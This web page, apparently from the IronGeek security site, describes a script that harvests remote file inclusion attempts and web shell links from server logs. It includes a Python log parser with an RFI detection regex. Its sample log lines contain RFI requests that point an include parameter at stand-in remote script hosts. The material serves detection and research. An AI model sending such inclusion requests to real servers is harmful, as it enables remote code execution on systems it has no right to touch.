Web Shells and RFIs Collection

I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple times, so I ignore the time fields when judging whether an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer hiding service so it does not look like I'm attacking anyone with the web shells (though the check for 404 sort of looks suspicious). This page will also let you link off to defense.ballastsecurity.net, where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo; it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells, you are likely pwned and should clean up your server.
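
As an added example (not the author's script), here is the core of that pipeline in Python: parse Apache combined-format log lines, pull out requests whose query string tries to include a remote URL, and dedupe on attacker, request, agent and referer while ignoring the time field. The log lines are constructed, and the live 404 check is left out so it runs offline.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format:
#   ip ident user [time] "METHOD path PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# RFI signature: a query parameter whose value is itself a URL. The match runs to the end of
# the query so the shell's own trailing parameters survive; case-insensitive to catch "htTp://".
RFI_RE = re.compile(r'[?&][^=&]*=(https?://.+)$', re.IGNORECASE)

# Constructed sample lines in the style of the page's table (not real log data).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Apr/2019:17:40:57 -0700] "GET /i.php?page=http://example.invalid/tst.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.5 - - [07/Apr/2019:18:02:11 -0700] "GET /i.php?page=http://example.invalid/tst.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.9 - - [08/Apr/2019:01:13:49 -0700] "GET /i.php?page=htTp://example.invalid/humans.txt&mode=print HTTP/1.1" 200 512 "-" "UserAgent"
192.0.2.77 - - [08/Apr/2019:02:00:00 -0700] "GET /i.php?page=security/wargames HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

def extract_rfi(path):
    """Return the remote URL an RFI attempt tries to include, or None for a normal request."""
    m = RFI_RE.search(unquote(path))   # decode %3A%2F%2F-style encoding first
    return m.group(1) if m else None

def find_unique_rfis(log_text):
    """Parse log lines, keep only RFI attempts, and dedupe on everything except the
    time field, as the page's script does; the first sighting's time is kept."""
    first_seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a combined-format line
        remote = extract_rfi(m['path'])
        if remote is None:
            continue                    # ordinary request, not an inclusion attempt
        key = (m['ip'], remote, m['agent'], m['referer'])
        first_seen.setdefault(key, m['time'])
    return [
        {'attacker': ip, 'request': remote, 'agent': agent, 'referer': referer, 'time': time}
        for (ip, remote, agent, referer), time in first_seen.items()
    ]

if __name__ == '__main__':
    for row in find_unique_rfis(SAMPLE_LOG):
        print(row['time'], row['attacker'], row['request'], row['agent'])
```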

Source code that generates this page

Filtered For More Likely Live Webshell RFIs

Columns: Attacker, Whois IP, Request (truncated if over 60 chr for display, link should still work), View on PHP Decoder, Agent, Referer, Time, Backup (Archived Webshell / Not In Archive)

Likely Dead Links


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek